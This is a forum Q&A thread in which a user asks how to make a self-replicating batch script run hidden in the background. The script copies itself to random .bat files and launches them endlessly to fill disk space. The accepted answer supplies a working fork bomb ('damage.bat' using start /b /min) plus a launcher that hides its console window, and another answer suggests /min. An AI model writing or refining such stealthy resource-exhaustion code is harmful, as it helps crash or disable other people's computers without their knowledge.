# Need a little push on my batch script

Tags: batch-file

I am running a batch file that is malicious (for educational reasons) for my school. 
What it does is it will repeat and worm and use up space. What i am looking for is to run it and be able to run it in the background so that it wont popup in the foreground. Like me going on facebook and it running in the background not affecting what i am doing. Again, not looking to harm any specific PC with this.

I am very new to batch.

```
@echo off 
:A 
SET /A X=%RANDOM%%%1999999999% 
type damage.bat >> %x%.bat 
start %x%.bat 
goto:A
```

Please help me be able to run this into the background instead of the foreground.

Any help would be appreciated very much!

EDIT:: could you also make it automatically close out all the windows it creates?

Comment: You could try this but I don't think it is what you want because it uses vb:
http://www.winhelponline.com/blog/run-bat-files-invisibly-without-displaying-command-prompt/
Why are you using .bat specifically?

Comment: using batch at school. :)

Answer (score 0, accepted):

First, three things:

- %random% outputs a random number from 0 to 32767 (as described in HELP SET) so you don't really need the modulus.
- You're allowed to run the same script multiple times, so I wouldn't bother renaming them.
- You'll find a few useful parameters in HELP START: /B starts the script in the same window, and /MIN starts in minimized.

So, you get a really simple **damage.bat**:

```
@echo off
:a
start /b /min damage.bat
goto :a
```

Which actually really crashed my computer when I tried it -.-

This keeps the CMD window open, so you might want to add a **launchDamage.bat**:

```
@echo off
start /min damage.bat
exit
```

Which runs damage.bat minimized, then exits -> closes CMD window.

Comment: okay i didnt need you to rewrite my script lol i figured it out :) all i needed was the /b /min. Thanks you guys both of you a ton :)

Answer (score 0):

replace this

```
    start %x%.bat
```

with this

```
    start %x%.bat /min
```

That should work, but  dont want to try to corrupt my computer XD

For info on any comand do

```
    theConfusingComand /?
```

Comment: thank you for attempting but unfortunatly i accepted the other one as best :( thanks A for effort!